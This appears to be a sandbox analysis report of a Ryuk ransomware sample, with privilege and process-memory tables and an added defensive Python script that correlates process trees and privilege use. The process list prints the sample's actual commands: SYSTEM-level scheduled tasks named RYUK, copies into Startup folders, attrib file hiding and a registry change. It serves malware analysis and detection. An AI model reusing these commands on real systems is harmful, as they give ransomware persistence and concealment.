N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
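Read together, the privilege table above and the WriteProcessMemory table that follows give the execution story: the sample spawns cmd.exe repeatedly, each cmd.exe drives one built-in (schtasks, attrib, reg, or another cmd), and the helpers that need elevated privileges enable them (wevtutil with SeSecurityPrivilege and SeBackupPrivilege for log clearing, taskkill with SeDebugPrivilege, vssvc.exe doing backup/restore work while WMIC runs). The script below is an added example, not part of the original report or of the sandbox that produced it: it rebuilds the process tree from rows in the page's "PID X wrote to memory of Y" layout, names the privilege LUIDs the sandbox left as bare numbers, and applies a few privilege-use rules. Its sample rows are copied from the two tables with the sample's SHA256 file name shortened to sample.exe; the ATT&CK technique IDs in the rules are this example's own mapping from the current Enterprise matrix, not the report's matrix section.

```python
"""Process tree and privilege correlation from sandbox signature rows.

Added example; not from the original report or any tool it names.
"""
import re
from collections import defaultdict

# 'PID <src> wrote to memory of <dst> <indicator> <src image> <dst image>'
WPM_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+)\s+\S+\s+(?P<src_img>\S+)\s+(?P<dst_img>\S+)$")
# 'Token: <privilege> <indicator> <image> <target>'
TOKEN_RE = re.compile(r"^Token: (?P<priv>\S+)\s+\S+\s+(?P<img>\S+)\s+\S+$")

# Privilege LUIDs the sandbox printed as numbers (values from winnt.h).
LUID_NAMES = {"33": "SeIncreaseWorkingSetPrivilege", "34": "SeTimeZonePrivilege",
              "35": "SeCreateSymbolicLinkPrivilege", "36": "SeDelegateSessionUserImpersonatePrivilege"}

# Built-ins this report shows being driven through cmd.exe, plus those its summary names.
LOLBINS = {"schtasks.exe", "attrib.exe", "reg.exe", "taskkill.exe", "wevtutil.exe", "wmic.exe",
           "vssadmin.exe", "bcdedit.exe", "wbadmin.exe", "sc.exe", "net.exe", "icacls.exe"}

# (image, privileges that must all be enabled, finding). wmic.exe is deliberately absent:
# WMIC enables every privilege in its token at start-up, so its long list above is normal
# WMIC behaviour on its own; the signal is the vssvc.exe activity recorded next to it.
PRIV_RULES = [
    ("wevtutil.exe", {"SeSecurityPrivilege", "SeBackupPrivilege"},
     "event log clear/export, consistent with 'Clears Windows event logs' (T1070.001)"),
    ("taskkill.exe", {"SeDebugPrivilege"}, "forced termination of processes it does not own (T1489)"),
    ("vssvc.exe", {"SeBackupPrivilege", "SeRestorePrivilege"},
     "VSS service driven during the run; with the WMIC rows this matches 'Deletes shadow copies' (T1490)"),
]

S = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"  # placeholder for the SHA256-named sample
WPM_ROWS = [  # copied from the report; each process start appears twice there, kept to show dedup
    rf"PID 1652 wrote to memory of 3956 N/A {S} C:\Windows\system32\cmd.exe",
    rf"PID 1652 wrote to memory of 3956 N/A {S} C:\Windows\system32\cmd.exe",
    r"PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe",
    r"PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe",
    rf"PID 1652 wrote to memory of 620 N/A {S} C:\Windows\system32\cmd.exe",
    r"PID 620 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe",
    rf"PID 1652 wrote to memory of 716 N/A {S} C:\Windows\system32\cmd.exe",
    r"PID 716 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe",
    rf"PID 1652 wrote to memory of 1056 N/A {S} C:\Windows\system32\cmd.exe",
    r"PID 1056 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe",
]
TOKEN_ROWS = [  # subset of the AdjustPrivilegeToken table above
    r"Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A",
    r"Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A",
    r"Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A",
    r"Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A",
    r"Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A",
    r"Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A",
    r"Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A",
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(rows):
    """Return (pid -> image path, parent pid -> set of child pids); duplicate rows collapse."""
    image, children = {}, defaultdict(set)
    for row in rows:
        m = WPM_RE.match(row)
        if m:
            src, dst = int(m["src"]), int(m["dst"])
            image[src], image[dst] = m["src_img"], m["dst_img"]
            children[src].add(dst)
    return image, children


def chains(image, children, root):
    """Root-to-leaf chains as 'a.exe > b.exe > c.exe' strings, depth first."""
    out = []

    def walk(pid, trail):
        trail = trail + [basename(image[pid])]
        kids = sorted(children.get(pid, ()))
        if not kids:
            out.append(" > ".join(trail))
        for kid in kids:
            walk(kid, trail)

    walk(root, [])
    return out


def suspicious_chains(all_chains):
    """Chains whose leaf is a built-in typically abused for persistence, evasion or recovery inhibition."""
    return [c for c in all_chains if c.split(" > ")[-1] in LOLBINS]


def privileges_by_image(rows):
    """Set of enabled privilege names per image basename, numeric LUIDs resolved."""
    privs = defaultdict(set)
    for row in rows:
        m = TOKEN_RE.match(row)
        if m:
            privs[basename(m["img"])].add(LUID_NAMES.get(m["priv"], m["priv"]))
    return privs


def privilege_findings(privs):
    return [(img, note) for img, required, note in PRIV_RULES if required <= privs.get(img, set())]


if __name__ == "__main__":
    image, children = build_tree(WPM_ROWS)
    for c in chains(image, children, 1652):
        print(("LOLBIN " if c in suspicious_chains(chains(image, children, 1652)) else "       ") + c)
    for img, note in privilege_findings(privileges_by_image(TOKEN_ROWS)):
        print(f"{img}: {note}")
```

In practice the same two parsers run over Sysmon event ID 1 (process creation, which carries the parent directly) and event ID 4703 from the Security log (privilege adjustment); the sandbox export merely stands in for them here, and the caveat about WMIC's blanket privilege enablement applies to 4703 data just as much.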

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1652 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3956 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 3884 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3884 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 620 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 620 wrote to memory of 4192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4360 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4360 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4184 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4184 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1652 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4268 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4268 wrote to memory of 3428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 2412 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2412 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1652 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 716 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 716 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1652 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1832 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1832 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1652 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 4936 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4936 wrote to memory of 824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2264 wrote to memory of 3772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2264 wrote to memory of 3772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1652 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1164 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1164 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

